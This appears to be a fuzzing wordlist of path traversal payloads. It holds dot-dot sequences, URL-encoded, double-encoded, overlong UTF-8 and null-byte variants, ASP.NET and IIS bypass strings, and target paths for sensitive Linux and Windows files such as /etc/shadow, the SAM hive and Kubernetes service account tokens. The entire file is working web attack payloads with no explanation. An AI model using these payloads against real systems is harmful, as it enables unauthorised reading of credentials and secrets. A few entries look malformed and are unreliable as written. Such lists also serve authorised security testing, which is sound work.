# -------- Core Traversal Sequences -----------------------
../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

../etc/shadow
../../etc/shadow
../../../etc/shadow

../etc/issue
../../etc/issue
../../../etc/issue

# -------- URL‑Encoded Variants ---------------------------
%2e%2e%2fetc%2fpasswd
%252e%252e%252fetc%252fpasswd

# -------- Unicode & Overlong UTF‑8 -----------------------
%c0%ae%c0ae%c0afetc%c0afpasswd
%c0%2e%c0ae%c0afetc%c0afpasswd
%uff0e%uff0e%u2215etc%u2215passwd

# -------- Mangled & Null‑byte Bypass ---------------------
..././.././etc/passwd
...\\.\..\\etc\\passwd
%00../etc/passwd
../etc/passwd%00

# -------- Common Linux File Targets ----------------------
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/motd
/var/lib/mlocate/mlocate.db
/proc/self/environ
/proc/self/cwd/index.php
/proc/net/tcp
/run/secrets/kubernetes.io/serviceaccount/token

# -------- Common Windows File Targets --------------------
C:\Windows\win.ini
C:\Windows\System32\drivers\etc\hosts
C:\Windows\System32\license.rtf
C:\inetpub\wwwroot\web.config
C:\Windows\repair\sam

# -------- UNC Share --------
\\localhost\c$\windows\win.ini

# -------- ASP.NET Cookieless Session Bypass --------------
/(S(SESSIONID))/web.config
/MyApp/(S(SESSIONID))/../(S(SESSIONID))/web.config

# -------- IIS Short‑Name Scanner Proof‑of‑Concept --------
/bin::$INDEX_ALLOCATION/
/MyApp/bin::$INDEX_ALLOCATION/

# -------- Java URL Protocol ------------------------------
url:file:///etc/passwd
url:http://127.0.0.1:8080/etc/passwd
